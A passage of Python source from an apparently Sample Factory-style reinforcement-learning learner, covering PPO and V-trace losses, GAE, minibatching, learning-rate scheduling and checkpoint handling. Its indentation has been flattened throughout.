def num_recent_kls_to_use(self) -> int:
return 1
def invoke_after_each_minibatch(self):
return True
class KlAdaptiveSchedulerPerEpoch(KlAdaptiveScheduler):
def __init__(self, cfg):
super().__init__(cfg)
self.num_minibatches_per_epoch = cfg.num_batches_per_iteration
def num_recent_kls_to_use(self) -> int:
return self.num_minibatches_per_epoch
def invoke_after_each_epoch(self):
return True
def get_lr_scheduler(cfg) -> LearningRateScheduler:
if cfg.lr_schedule == 'constant':
return LearningRateScheduler()
elif cfg.lr_schedule == 'kl_adaptive_minibatch':
return KlAdaptiveSchedulerPerMinibatch(cfg)
elif cfg.lr_schedule == 'kl_adaptive_epoch':
return KlAdaptiveSchedulerPerEpoch(cfg)
else:
raise RuntimeError(f'Unknown scheduler {cfg.lr_schedule}')
class LearnerWorker:
def __init__(
self, worker_idx, policy_id, cfg, obs_space, action_space, report_queue, policy_worker_queues, shared_buffers,
policy_lock, resume_experience_collection_cv,
):
log.info('Initializing the learner %d for policy %d', worker_idx, policy_id)
self.worker_idx = worker_idx
self.policy_id = policy_id
self.cfg = cfg
# PBT-related stuff
self.should_save_model = True # set to true if we need to save the model to disk on the next training iteration
self.load_policy_id = None # non-None when we need to replace our parameters with another policy's parameters
self.pbt_mutex = None # deferred initialization
self.new_cfg = None # non-None when we need to update the learning hyperparameters
self.terminate = False
self.num_batches_processed = 0
self.obs_space = obs_space
self.action_space = action_space
self.shared_buffers = shared_buffers
# deferred initialization
self.rollout_tensors = None
self.policy_versions = None
self.stop_experience_collection = None
self.stop_experience_collection_num_msgs = self.resume_experience_collection_num_msgs = 0
self.device = None
self.actor_critic = None
self.aux_loss_module = None
self.optimizer = None
self.policy_lock = policy_lock
self.resume_experience_collection_cv = resume_experience_collection_cv
self.lr_scheduler: Optional[LearningRateScheduler] = None
self.task_queue = MpQueue()
self.report_queue = report_queue
self.initialized_event = MultiprocessingEvent()
self.initialized_event.clear()
self.model_saved_event = MultiprocessingEvent()
self.model_saved_event.clear()
# queues corresponding to policy workers using the same policy
# we send weight updates via these queues
self.policy_worker_queues = policy_worker_queues
self.experience_buffer_queue = None # deferred initialization
self.tensor_batch_pool = self.tensor_batcher = None
self.with_training = True # set to False for debugging no-training regime
self.train_in_background = self.cfg.train_in_background_thread # set to False for debugging
self.training_thread = None
self.train_thread_initialized = None
self.is_training = False
self.train_step = self.env_steps = 0
# decay rate at which summaries are collected
# save summaries every 5 seconds in the beginning, but decay to every 4 minutes in the limit, because we
# do not need frequent summaries for longer experiments
self.summary_rate_decay_seconds = LinearDecay([(0, 5), (100000, 120), (1000000, 240)])
self.last_summary_time = 0
self.last_saved_time = self.last_milestone_time = 0
self.discarded_experience_over_time = deque([], maxlen=30)
self.discarded_experience_timer = time.time()
self.num_discarded_rollouts = 0
self.process = Process(target=self._run, daemon=True)
if is_continuous_action_space(self.action_space) and self.cfg.exploration_loss == 'symmetric_kl':
raise NotImplementedError('KL-divergence exploration loss is not supported with '
'continuous action spaces. Use entropy exploration loss')
# deferred initialization
self.exploration_loss_func = None
self.kl_loss_func = None
def start_process(self):
self.process.start()
def deferred_initialization(self):
self.rollout_tensors = self.shared_buffers.tensors
self.policy_versions = self.shared_buffers.policy_versions
self.stop_experience_collection = self.shared_buffers.stop_experience_collection
self.pbt_mutex = threading.Lock()
self.experience_buffer_queue = Queue()
self.tensor_batch_pool = ObjectPool()
self.tensor_batcher = TensorBatcher(self.tensor_batch_pool)
self.training_thread = Thread(target=self._train_loop) if self.train_in_background else None
self.train_thread_initialized = threading.Event()
if self.cfg.exploration_loss_coeff == 0.0:
self.exploration_loss_func = lambda action_distr, valids: 0.0
elif self.cfg.exploration_loss == 'entropy':
self.exploration_loss_func = self._entropy_exploration_loss
elif self.cfg.exploration_loss == 'symmetric_kl':
self.exploration_loss_func = self._symmetric_kl_exploration_loss
else:
raise NotImplementedError(f'{self.cfg.exploration_loss} not supported!')
if self.cfg.kl_loss_coeff == 0.0:
if is_continuous_action_space(self.action_space):
log.warning(
'WARNING! It is recommended to enable Fixed KL loss (https://arxiv.org/pdf/1707.06347.pdf) for continuous action tasks. '
'I.e. set --kl_loss_coeff=1.0'
)
time.sleep(3.0)
self.kl_loss_func = lambda action_space, action_logits, distribution, valids: 0.0
else:
self.kl_loss_func = self._kl_loss
def _init(self):
log.info('Waiting for the learner to initialize...')
self.train_thread_initialized.wait()
log.info('Learner %d initialized', self.worker_idx)
self.initialized_event.set()
def _terminate(self):
self.terminate = True
def _broadcast_model_weights(self):
state_dict = self.actor_critic.state_dict()
policy_version = self.train_step
log.debug('Broadcast model weights for model version %d', policy_version)
model_state = (policy_version, state_dict)
for q in self.policy_worker_queues:
q.put((TaskType.INIT_MODEL, model_state))
def _calculate_gae(self, buffer):
"""
Calculate advantages using Generalized Advantage Estimation.
This is leftover the from previous version of the algorithm.
Perhaps should be re-implemented in PyTorch tensors, similar to V-trace for uniformity.
"""
rewards = np.copy(buffer.rewards) # [E, T]
dones = np.copy(buffer.dones) # [E, T]
values_arr = np.copy(buffer.values) # [E, T]
# calculating fake values for the last step in the rollout
# this will make sure that advantage of the very last action is always zero
values = []
for i in range(len(values_arr)):
last_value, last_reward = values_arr[i][-1], rewards[i, -1]
next_value = (last_value - last_reward) / self.cfg.gamma
values.append(list(values_arr[i]))
values[i].append(float(next_value)) # [T] -> [T+1]
# calculating returns and GAE
rewards = rewards.transpose((1, 0)) # [E, T] -> [T, E]
dones = dones.transpose((1, 0)) # [E, T] -> [T, E]
values = np.asarray(values).transpose((1, 0)) # [E, T+1] -> [T+1, E]
advantages, returns = calculate_gae(rewards, dones, values, self.cfg.gamma, self.cfg.gae_lambda)
# transpose tensors back to [E, T] before creating a single experience buffer
buffer.advantages = advantages.transpose((1, 0)) # [T, E] -> [E, T]
buffer.returns = returns.transpose((1, 0)) # [T, E] -> [E, T]
return buffer
def _prepare_train_buffer(self, rollouts, macro_batch_size, timing):
trajectories = [AttrDict(r['t']) for r in rollouts]
with timing.add_time('buffers'):
buffer = AttrDict()
# by the end of this loop the buffer is a dictionary containing lists of numpy arrays
for i, t in enumerate(trajectories):
for key, x in t.items():
if key not in buffer:
buffer[key] = []
buffer[key].append(x)
# convert lists of dict observations to a single dictionary of lists
for key, x in buffer.items():
if isinstance(x[0], (dict, OrderedDict)):
buffer[key] = list_of_dicts_to_dict_of_lists(x)
with timing.add_time('buffer_stack_and_squeeze'):
tensors_to_squeeze = [
'actions', 'log_prob_actions', 'policy_version', 'policy_id', 'values', 'rewards', 'dones',
]
for d, key, arr in iterate_recursively(buffer):
t = np.stack(arr) # all buffers should now be [E, T, orig_shape]
if key in tensors_to_squeeze:
t = t.squeeze()
d[key] = t
# add max entropy to the rewards
if self.cfg.max_entropy_coeff != 0.0:
with timing.add_time('max_entropy'), torch.no_grad():
action_distr_params = buffer.action_logits.reshape((-1, buffer.action_logits.shape[-1])) # [E*T, A]
entropies = get_action_distribution(self.action_space, torch.Tensor(action_distr_params)).entropy().numpy() # [E*T]
entropies = entropies.reshape((-1, self.cfg.rollout)) # [E, T]
buffer.rewards += self.cfg.max_entropy_coeff * entropies # [E, T]
if not self.cfg.with_vtrace:
with timing.add_time('calc_gae'):
buffer = self._calculate_gae(buffer)
with timing.add_time('batching'):
for d, key, arr in iterate_recursively(buffer):
envs_dim, time_dim = arr.shape[0:2]
new_shape = (envs_dim * time_dim, ) + arr.shape[2:]
d[key] = arr.reshape(new_shape)
# concatenate rollouts from different workers into a single batch efficiently
# that is, if we already have memory for the buffers allocated, we can just copy the data into
# existing cached tensors instead of creating new ones. This is a performance optimization.
use_pinned_memory = self.cfg.device == 'gpu'
buffer = self.tensor_batcher.cat(buffer, macro_batch_size, use_pinned_memory, timing)
with timing.add_time('buff_ready'):
self.shared_buffers.free_trajectory_buffers([r.traj_buffer_idx for r in rollouts])
with timing.add_time('tensors_gpu_float'):
device_buffer = self._copy_train_data_to_device(buffer)
# we no longer need the cached buffer, and can put it back into the pool
self.tensor_batch_pool.put(buffer)
return device_buffer
def _macro_batch_size(self, batch_size):
return self.cfg.num_batches_per_iteration * batch_size
def _process_macro_batch(self, rollouts, batch_size, timing):
macro_batch_size = self._macro_batch_size(batch_size)
assert macro_batch_size % self.cfg.rollout == 0
assert self.cfg.rollout % self.cfg.recurrence == 0
assert macro_batch_size % self.cfg.recurrence == 0
samples = env_steps = 0
for rollout in rollouts:
samples += rollout['length']
env_steps += rollout['env_steps']
with timing.add_time('prepare'):
buffer = self._prepare_train_buffer(rollouts, macro_batch_size, timing)
self.experience_buffer_queue.put((buffer, batch_size, samples, env_steps))
if not self.cfg.benchmark and self.cfg.train_in_background_thread:
# in PyTorch 1.4.0 there is an intense memory spike when the very first batch is being processed
# we wait here until this is over so we can continue queueing more batches onto a GPU without having
# a risk to run out of GPU memory
while self.num_batches_processed < 1:
log.debug('Waiting for the first batch to be processed')
time.sleep(0.5)
def _process_rollouts(self, rollouts, timing):
# batch_size can potentially change through PBT, so we should keep it the same and pass it around
# using function arguments, instead of using global self.cfg
batch_size = self.cfg.batch_size
rollouts_in_macro_batch = self._macro_batch_size(batch_size) // self.cfg.rollout
if len(rollouts) < rollouts_in_macro_batch:
return rollouts
to_discard = 0
to_process = []
policy_version = self.train_step
for r in rollouts:
mask = r.t['policy_id'] == self.policy_id
if np.any(mask):
rollout_newest_version = r.t['policy_version'][mask].max().item()
else:
log.error(
'Learner %d got a rollout without any transitions produced by policy %d. This must be a bug.',
self.policy_id, self.policy_id,
)
log.error('Rollout policy ids: %r', r.t['policy_id'])
rollout_newest_version = policy_version - self.cfg.max_policy_lag
if policy_version - rollout_newest_version >= self.cfg.max_policy_lag:
# the entire rollout is too old, discard it!
to_discard += 1
self.shared_buffers.free_trajectory_buffers([r.traj_buffer_idx])
else:
# There is some experience in the rollout that we can learn from.
# Old experience (older than max policy lag), experience from other policies (in case of policy
# change on episode boundary), and experience from inactive agents (policy id = -1) will be masked
# out during loss calculations.
to_process.append(r)
if to_discard > 0:
log.warning(
'Discarding %d old rollouts, cut by policy lag threshold %d (learner %d)',
to_discard, self.cfg.max_policy_lag, self.policy_id,
)
rollouts = to_process
self.num_discarded_rollouts += to_discard
if len(rollouts) >= rollouts_in_macro_batch:
# process newest rollouts
rollouts_to_process = rollouts[:rollouts_in_macro_batch]
rollouts = rollouts[rollouts_in_macro_batch:]
self._process_macro_batch(rollouts_to_process, batch_size, timing)
# log.info('Unprocessed rollouts: %d (%d samples)', len(rollouts), len(rollouts) * self.cfg.rollout)
return rollouts
def _get_minibatches(self, batch_size, experience_size):
"""Generating minibatches for training."""
assert self.cfg.rollout % self.cfg.recurrence == 0
assert experience_size % batch_size == 0, f'experience size: {experience_size}, batch size: {batch_size}'
if self.cfg.num_batches_per_iteration == 1:
return [None] # single minibatch is actually the entire buffer, we don't need indices
# indices that will start the mini-trajectories from the same episode (for bptt)
indices = np.arange(0, experience_size, self.cfg.recurrence)
indices = np.random.permutation(indices)
# complete indices of mini trajectories, e.g. with recurrence==4: [4, 16] -> [4, 5, 6, 7, 16, 17, 18, 19]
indices = [np.arange(i, i + self.cfg.recurrence) for i in indices]
indices = np.concatenate(indices)
assert len(indices) == experience_size
num_minibatches = experience_size // batch_size
minibatches = np.split(indices, num_minibatches)
return minibatches
@staticmethod
def _get_minibatch(buffer, indices):
if indices is None:
# handle the case of a single batch, where the entire buffer is a minibatch
return buffer
mb = AttrDict()
for item, x in buffer.items():
if isinstance(x, (dict, OrderedDict)):
mb[item] = AttrDict()
for key, x_elem in x.items():
mb[item][key] = x_elem[indices]
else:
mb[item] = x[indices]
return mb
def _should_save_summaries(self):
summaries_every_seconds = self.summary_rate_decay_seconds.at(self.train_step)
if time.time() - self.last_summary_time < summaries_every_seconds:
return False
return True
def _after_optimizer_step(self):
"""A hook to be called after each optimizer step."""
self.train_step += 1
self._maybe_save()
def _maybe_save(self):
if time.time() - self.last_saved_time >= self.cfg.save_every_sec or self.should_save_model:
self._save()
self.model_saved_event.set()
self.should_save_model = False
self.last_saved_time = time.time()
@staticmethod
def checkpoint_dir(cfg, policy_id):
checkpoint_dir = join(experiment_dir(cfg=cfg), f'checkpoint_p{policy_id}')
return ensure_dir_exists(checkpoint_dir)
@staticmethod
def get_checkpoints(checkpoints_dir):
checkpoints = glob.glob(join(checkpoints_dir, 'checkpoint_*'))
return sorted(checkpoints)
def _get_checkpoint_dict(self):
checkpoint = {
'train_step': self.train_step,
'env_steps': self.env_steps,
'model': self.actor_critic.state_dict(),
'optimizer': self.optimizer.state_dict(),
}
if self.aux_loss_module is not None:
checkpoint['aux_loss_module'] = self.aux_loss_module.state_dict()
return checkpoint
def _save(self):
checkpoint = self._get_checkpoint_dict()
assert checkpoint is not None
checkpoint_dir = self.checkpoint_dir(self.cfg, self.policy_id)
tmp_filepath = join(checkpoint_dir, '.temp_checkpoint')
checkpoint_name = f'checkpoint_{self.train_step:09d}_{self.env_steps}.pth'
filepath = join(checkpoint_dir, checkpoint_name)
log.info('Saving %s...', tmp_filepath)
torch.save(checkpoint, tmp_filepath)
log.info('Renaming %s to %s', tmp_filepath, filepath)
os.rename(tmp_filepath, filepath)
while len(self.get_checkpoints(checkpoint_dir)) > self.cfg.keep_checkpoints:
oldest_checkpoint = self.get_checkpoints(checkpoint_dir)[0]
if os.path.isfile(oldest_checkpoint):
log.debug('Removing %s', oldest_checkpoint)
os.remove(oldest_checkpoint)
if self.cfg.save_milestones_sec > 0:
# milestones enabled
if time.time() - self.last_milestone_time >= self.cfg.save_milestones_sec:
milestones_dir = ensure_dir_exists(join(checkpoint_dir, 'milestones'))
milestone_path = join(milestones_dir, f'{checkpoint_name}.milestone')
log.debug('Saving a milestone %s', milestone_path)
shutil.copy(filepath, milestone_path)
self.last_milestone_time = time.time()
@staticmethod
def _policy_loss(ratio, adv, clip_ratio_low, clip_ratio_high, valids):
clipped_ratio = torch.clamp(ratio, clip_ratio_low, clip_ratio_high)
loss_unclipped = ratio * adv
loss_clipped = clipped_ratio * adv
loss = torch.min(loss_unclipped, loss_clipped)
loss = torch.masked_select(loss, valids)
loss = -loss.mean()
return loss
def _value_loss(self, new_values, old_values, target, clip_value, valids):
value_clipped = old_values + torch.clamp(new_values - old_values, -clip_value, clip_value)
value_original_loss = (new_values - target).pow(2)
value_clipped_loss = (value_clipped - target).pow(2)
value_loss = torch.max(value_original_loss, value_clipped_loss)
value_loss = torch.masked_select(value_loss, valids)
value_loss = value_loss.mean()
value_loss *= self.cfg.value_loss_coeff
return value_loss
def _kl_loss(self, action_space, action_logits, action_distribution, valids):
old_action_distribution = get_action_distribution(action_space, action_logits)
kl_loss = action_distribution.kl_divergence(old_action_distribution)
kl_loss = torch.masked_select(kl_loss, valids)
kl_loss = kl_loss.mean()
kl_loss *= self.cfg.kl_loss_coeff
return kl_loss
def _entropy_exploration_loss(self, action_distribution, valids):
entropy = action_distribution.entropy()
entropy = torch.masked_select(entropy, valids)
entropy_loss = -self.cfg.exploration_loss_coeff * entropy.mean()
return entropy_loss
def _symmetric_kl_exploration_loss(self, action_distribution, valids):
kl_prior = action_distribution.symmetric_kl_with_uniform_prior()
kl_prior = torch.masked_select(kl_prior, valids).mean()
if not torch.isfinite(kl_prior):
kl_prior = torch.zeros(kl_prior.shape)
kl_prior = torch.clamp(kl_prior, max=30)
kl_prior_loss = self.cfg.exploration_loss_coeff * kl_prior
return kl_prior_loss
def _curr_lr(self):
for param_group in self.optimizer.param_groups:
return param_group['lr']
def _update_lr(self, new_lr):
if new_lr != self._curr_lr():
for param_group in self.optimizer.param_groups:
param_group['lr'] = new_lr
def _prepare_observations(self, obs_tensors, gpu_buffer_obs):
for d, gpu_d, k, v, _ in iter_dicts_recursively(obs_tensors, gpu_buffer_obs):
device, dtype = self.actor_critic.device_and_type_for_input_tensor(k)
tensor = v.detach().to(device, copy=True).type(dtype)
gpu_d[k] = tensor
def _copy_train_data_to_device(self, buffer):
device_buffer = copy_dict_structure(buffer)
for key, item in buffer.items():
if key == 'obs':
self._prepare_observations(item, device_buffer['obs'])
else:
device_tensor = item.detach().to(self.device, copy=True, non_blocking=True)
device_buffer[key] = device_tensor.float()
device_buffer['dones_cpu'] = buffer.dones.to('cpu', copy=True, non_blocking=True).float()
device_buffer['rewards_cpu'] = buffer.rewards.to('cpu', copy=True, non_blocking=True).float()
return device_buffer
def _train(self, gpu_buffer, batch_size, experience_size, timing):
with torch.no_grad():
policy_version_before_train = self.train_step
early_stopping_tolerance = 1e-6
early_stop = False
prev_epoch_actor_loss = 1e9
epoch_actor_losses = []
# recent mean KL-divergences per minibatch, this used by LR schedulers
recent_kls = []
# V-trace parameters
# noinspection PyArgumentList
rho_hat = torch.Tensor([self.cfg.vtrace_rho])
# noinspection PyArgumentList
c_hat = torch.Tensor([self.cfg.vtrace_c])
clip_ratio_high = 1.0 + self.cfg.ppo_clip_ratio # e.g. 1.1
# this still works with e.g. clip_ratio = 2, while PPO's 1-r would give negative ratio
clip_ratio_low = 1.0 / clip_ratio_high
clip_value = self.cfg.ppo_clip_value
gamma = self.cfg.gamma
recurrence = self.cfg.recurrence
if self.cfg.with_vtrace:
assert recurrence == self.cfg.rollout and recurrence > 1, \
'V-trace requires to recurrence and rollout to be equal'
num_sgd_steps = 0
stats_and_summaries = None
if not self.with_training:
return stats_and_summaries
for epoch in range(self.cfg.ppo_epochs):
with timing.add_time('epoch_init'):
if early_stop or self.terminate:
break
summary_this_epoch = force_summaries = False
minibatches = self._get_minibatches(batch_size, experience_size)
for batch_num in range(len(minibatches)):
with timing.add_time('minibatch_init'):
indices = minibatches[batch_num]
# current minibatch consisting of short trajectory segments with length == recurrence
mb = self._get_minibatch(gpu_buffer, indices)
# calculate policy head outside of recurrent loop
with timing.add_time('forward_head'):
head_outputs = self.actor_critic.forward_head(mb.obs)
# initial rnn states
with timing.add_time('bptt_initial'):
if self.cfg.use_rnn:
head_output_seq, rnn_states, inverted_select_inds = build_rnn_inputs(
head_outputs, mb.dones_cpu, mb.rnn_states, recurrence,
)
else:
rnn_states = mb.rnn_states[::recurrence]
# calculate RNN outputs for each timestep in a loop
with timing.add_time('bptt'):
if self.cfg.use_rnn:
with timing.add_time('bptt_forward_core'):
core_output_seq, _ = self.actor_critic.forward_core(head_output_seq, rnn_states)
core_outputs = build_core_out_from_seq(core_output_seq, inverted_select_inds)
else:
core_outputs, _ = self.actor_critic.forward_core(head_outputs, rnn_states)
num_trajectories = head_outputs.size(0) // recurrence
with timing.add_time('tail'):
assert core_outputs.shape[0] == head_outputs.shape[0]
# calculate policy tail outside of recurrent loop
result = self.actor_critic.forward_tail(core_outputs, with_action_distribution=True)
action_distribution = result.action_distribution
log_prob_actions = action_distribution.log_prob(mb.actions)
ratio = torch.exp(log_prob_actions - mb.log_prob_actions) # pi / pi_old
# super large/small values can cause numerical problems and are probably noise anyway
ratio = torch.clamp(ratio, 0.05, 20.0)
values = result.values.squeeze()
with torch.no_grad(): # these computations are not the part of the computation graph
# ignore experience from other agents (i.e. on episode boundary) and from inactive agents
valids = mb.policy_id == self.policy_id
# ignore experience that was older than the threshold even before training started
valids = valids & (policy_version_before_train - mb.policy_version < self.cfg.max_policy_lag)
if self.cfg.with_vtrace:
ratios_cpu = ratio.cpu()
values_cpu = values.cpu()
rewards_cpu = mb.rewards_cpu
dones_cpu = mb.dones_cpu
vtrace_rho = torch.min(rho_hat, ratios_cpu)
vtrace_c = torch.min(c_hat, ratios_cpu)
vs = torch.zeros((num_trajectories * recurrence))
adv = torch.zeros((num_trajectories * recurrence))
next_values = (values_cpu[recurrence - 1::recurrence] - rewards_cpu[recurrence - 1::recurrence]) / gamma
next_vs = next_values
with timing.add_time('vtrace'):
for i in reversed(range(self.cfg.recurrence)):
rewards = rewards_cpu[i::recurrence]
dones = dones_cpu[i::recurrence]
not_done = 1.0 - dones
not_done_times_gamma = not_done * gamma
curr_values = values_cpu[i::recurrence]
curr_vtrace_rho = vtrace_rho[i::recurrence]
curr_vtrace_c = vtrace_c[i::recurrence]
delta_s = curr_vtrace_rho * (rewards + not_done_times_gamma * next_values - curr_values)
adv[i::recurrence] = curr_vtrace_rho * (rewards + not_done_times_gamma * next_vs - curr_values)
next_vs = curr_values + delta_s + not_done_times_gamma * curr_vtrace_c * (next_vs - next_values)
vs[i::recurrence] = next_vs
next_values = curr_values
targets = vs
else:
# using regular GAE
adv = mb.advantages
targets = mb.returns
adv_mean = adv.mean()
adv_std = adv.std()
adv = (adv - adv_mean) / max(1e-3, adv_std) # normalize advantage
adv = adv.to(self.device)
with timing.add_time('losses'):
policy_loss = self._policy_loss(ratio, adv, clip_ratio_low, clip_ratio_high, valids)
exploration_loss = self.exploration_loss_func(action_distribution, valids)
kl_loss = self.kl_loss_func(self.actor_critic.action_space, mb.action_logits, action_distribution, valids)
actor_loss = policy_loss + exploration_loss + kl_loss
epoch_actor_losses.append(actor_loss.item())
targets = targets.to(self.device)
old_values = mb.values
value_loss = self._value_loss(values, old_values, targets, clip_value, valids)
critic_loss = value_loss
loss = actor_loss + critic_loss
if self.aux_loss_module is not None:
with timing.add_time('aux_loss'):
aux_loss = self.aux_loss_module(
mb.actions.view(num_trajectories, recurrence, -1),
(1.0 - mb.dones).view(num_trajectories, recurrence, 1),
valids.view(num_trajectories, recurrence, -1),
head_outputs.view(num_trajectories, recurrence, -1),
core_outputs.view(num_trajectories, recurrence, -1),
)
loss = loss + aux_loss
high_loss = 30.0
if abs(to_scalar(policy_loss)) > high_loss or abs(to_scalar(value_loss)) > high_loss or abs(to_scalar(exploration_loss)) > high_loss or abs(to_scalar(kl_loss)) > high_loss:
log.warning(
'High loss value: l:%.4f pl:%.4f vl:%.4f exp_l:%.4f kl_l:%.4f (recommended to adjust the --reward_scale parameter)',
to_scalar(loss), to_scalar(policy_loss), to_scalar(value_loss), to_scalar(exploration_loss), to_scalar(kl_loss),
)
force_summaries = True
with timing.add_time('kl_divergence'):
# calculate KL-divergence with the behaviour policy action distribution
old_action_distribution = get_action_distribution(
self.actor_critic.action_space, mb.action_logits,
)
kl_old = action_distribution.kl_divergence(old_action_distribution)
kl_old_mean = kl_old.mean().item()
recent_kls.append(kl_old_mean)
# update the weights
with timing.add_time('update'):
# following advice from https://youtu.be/9mS1fIYj1So set grad to None instead of optimizer.zero_grad()
for p in self.actor_critic.parameters():
p.grad = None
if self.aux_loss_module is not None:
for p in self.aux_loss_module.parameters():
p.grad = None
loss.backward()
if self.cfg.max_grad_norm > 0.0:
with timing.add_time('clip'):
torch.nn.utils.clip_grad_norm_(self.actor_critic.parameters(), self.cfg.max_grad_norm)
if self.aux_loss_module is not None:
torch.nn.utils.clip_grad_norm_(self.aux_loss_module.parameters(), self.cfg.max_grad_norm)
curr_policy_version = self.train_step # policy version before the weight update
with self.policy_lock:
self.optimizer.step()
num_sgd_steps += 1
with torch.no_grad():
with timing.add_time('after_optimizer'):
self._after_optimizer_step()
if self.lr_scheduler.invoke_after_each_minibatch():
self._update_lr(self.lr_scheduler.update(self._curr_lr(), recent_kls))
# collect and report summaries
with_summaries = self._should_save_summaries() or force_summaries
if with_summaries and not summary_this_epoch:
stats_and_summaries = self._record_summaries(AttrDict(locals()))
summary_this_epoch = True
force_summaries = False
# end of an epoch
if self.lr_scheduler.invoke_after_each_epoch():
self._update_lr(self.lr_scheduler.update(self._curr_lr(), recent_kls))
# this will force policy update on the inference worker (policy worker)
self.policy_versions[self.policy_id] = self.train_step
new_epoch_actor_loss = np.mean(epoch_actor_losses)
loss_delta_abs = abs(prev_epoch_actor_loss - new_epoch_actor_loss)
if loss_delta_abs < early_stopping_tolerance:
early_stop = True
log.debug(
'Early stopping after %d epochs (%d sgd steps), loss delta %.7f',
epoch + 1, num_sgd_steps, loss_delta_abs,
)
break
prev_epoch_actor_loss = new_epoch_actor_loss
epoch_actor_losses = []
return stats_and_summaries
def _record_summaries(self, train_loop_vars):
var = train_loop_vars
self.last_summary_time = time.time()
stats = AttrDict()
stats.lr = self._curr_lr()
stats.valids_fraction = var.valids.float().mean()
stats.same_policy_fraction = (var.mb.policy_id == self.policy_id).float().mean()
grad_norm = sum(
p.grad.data.norm(2).item() ** 2
for p in self.actor_critic.parameters()
if p.grad is not None
) ** 0.5
stats.grad_norm = grad_norm
stats.loss = var.loss
stats.value = var.result.values.mean()
stats.entropy = var.action_distribution.entropy().mean()
stats.policy_loss = var.policy_loss
stats.kl_loss = var.kl_loss
stats.value_loss = var.value_loss
stats.exploration_loss = var.exploration_loss
if self.aux_loss_module is not None:
stats.aux_loss = var.aux_loss
stats.adv_min = var.adv.min()
stats.adv_max = var.adv.max()
stats.adv_std = var.adv_std
stats.max_abs_logprob = torch.abs(var.mb.action_logits).max()
if hasattr(var.action_distribution, 'summaries'):
stats.update(var.action_distribution.summaries())
if var.epoch == self.cfg.ppo_epochs - 1 and var.batch_num == len(var.minibatches) - 1:
# we collect these stats only for the last PPO batch, or every time if we're only doing one batch, IMPALA-style
ratio_mean = torch.abs(1.0 - var.ratio).mean().detach()
ratio_min = var.ratio.min().detach()
ratio_max = var.ratio.max().detach()
# log.debug('Learner %d ratio mean min max %.4f %.4f %.4f', self.policy_id, ratio_mean.cpu().item(), ratio_min.cpu().item(), ratio_max.cpu().item())
value_delta = torch.abs(var.values - var.old_values)
value_delta_avg, value_delta_max = value_delta.mean(), value_delta.max()
stats.kl_divergence = var.kl_old_mean
stats.kl_divergence_max = var.kl_old.max()
stats.value_delta = value_delta_avg
stats.value_delta_max = value_delta_max
stats.fraction_clipped = ((var.ratio < var.clip_ratio_low).float() + (var.ratio > var.clip_ratio_high).float()).mean()
stats.ratio_mean = ratio_mean
stats.ratio_min = ratio_min
stats.ratio_max = ratio_max
stats.num_sgd_steps = var.num_sgd_steps
# this caused numerical issues on some versions of PyTorch with second moment reaching infinity
adam_max_second_moment = 0.0
for key, tensor_state in self.optimizer.state.items():
adam_max_second_moment = max(tensor_state['exp_avg_sq'].max().item(), adam_max_second_moment)
stats.adam_max_second_moment = adam_max_second_moment
version_diff = (var.curr_policy_version - var.mb.policy_version)[var.mb.policy_id == self.policy_id]
stats.version_diff_avg = version_diff.mean()
stats.version_diff_min = version_diff.min()
stats.version_diff_max = version_diff.max()
for key, value in stats.items():
stats[key] = to_scalar(value)
return stats
def _update_pbt(self):
"""To be called from the training loop, same thread that updates the model!"""
with self.pbt_mutex:
if self.load_policy_id is not None:
assert self.cfg.with_pbt
log.debug('Learner %d loads policy from %d', self.policy_id, self.load_policy_id)
self.load_from_checkpoint(self.load_policy_id)
self.load_policy_id = None
if self.new_cfg is not None:
for key, value in self.new_cfg.items():
if self.cfg[key] != value:
log.debug('Learner %d replacing cfg parameter %r with new value %r', self.policy_id, key, value)
self.cfg[key] = value
for param_group in self.optimizer.param_groups:
param_group['lr'] = self.cfg.learning_rate
param_group['betas'] = (self.cfg.adam_beta1, self.cfg.adam_beta2)
log.debug('Updated optimizer lr to value %.7f, betas: %r', param_group['lr'], param_group['betas'])
self.new_cfg = None
@staticmethod
def load_checkpoint(checkpoints, device):
if len(checkpoints) <= 0:
log.warning('No checkpoints found')
return None
else:
latest_checkpoint = checkpoints[-1]
# extra safety mechanism to recover from spurious filesystem errors
num_attempts = 3
for attempt in range(num_attempts):
try:
log.warning('Loading state from checkpoint %s...', latest_checkpoint)
checkpoint_dict = torch.load(latest_checkpoint, map_location=device)
return checkpoint_dict
except Exception:
log.exception(f'Could not load from checkpoint, attempt {attempt}')
def _load_state(self, checkpoint_dict, load_progress=True):
if load_progress:
self.train_step = checkpoint_dict['train_step']
self.env_steps = checkpoint_dict['env_steps']
self.actor_critic.load_state_dict(checkpoint_dict['model'])
self.optimizer.load_state_dict(checkpoint_dict['optimizer'])
if self.aux_loss_module is not None:
self.aux_loss_module.load_state_dict(checkpoint_dict['aux_loss_module'])
log.info('Loaded experiment state at training iteration %d, env step %d', self.train_step, self.env_steps)
def init_model(self, timing):
self.actor_critic = create_actor_critic(self.cfg, self.obs_space, self.action_space, timing)
self.actor_critic.model_to_device(self.device)
self.actor_critic.share_memory()
if self.cfg.use_cpc:
self.aux_loss_module = CPCA(self.cfg, self.action_space)
if self.aux_loss_module is not None:
self.aux_loss_module.to(device=self.device)
def load_from_checkpoint(self, policy_id):
checkpoints = self.get_checkpoints(self.checkpoint_dir(self.cfg, policy_id))
checkpoint_dict = self.load_checkpoint(checkpoints, self.device)
if checkpoint_dict is None:
log.debug('Did not load from checkpoint, starting from scratch!')
else:
log.debug('Loading model from checkpoint')
# if we're replacing our policy with another policy (under PBT), let's not reload the env_steps
load_progress = policy_id == self.policy_id
self._load_state(checkpoint_dict, load_progress=load_progress)
def initialize(self, timing):
with timing.timeit('init'):
# initialize the Torch modules
if self.cfg.seed is None:
log.info('Starting seed is not provided')
else:
log.info('Setting fixed seed %d', self.cfg.seed)
torch.manual_seed(self.cfg.seed)
np.random.seed(self.cfg.seed)
# this does not help with a single experiment
# but seems to do better when we're running more than one experiment in parallel
torch.set_num_threads(1)
if self.cfg.device == 'gpu':
torch.backends.cudnn.benchmark = True
# we should already see only one CUDA device, because of env vars
assert torch.cuda.device_count() == 1
self.device = torch.device('cuda', index=0)
else:
self.device = torch.device('cpu')
self.init_model(timing)
params = list(self.actor_critic.parameters())
if self.aux_loss_module is not None:
params += list(self.aux_loss_module.parameters())
self.optimizer = torch.optim.Adam(
params,
self.cfg.learning_rate,
betas=(self.cfg.adam_beta1, self.cfg.adam_beta2),
eps=self.cfg.adam_eps,
)
self.lr_scheduler = get_lr_scheduler(self.cfg)
self.load_from_checkpoint(self.policy_id)
self._broadcast_model_weights() # sync the very first version of the weights
self.train_thread_initialized.set()
def _process_training_data(self, data, timing, wait_stats=None):
self.is_training = True
buffer, batch_size, samples, env_steps = data
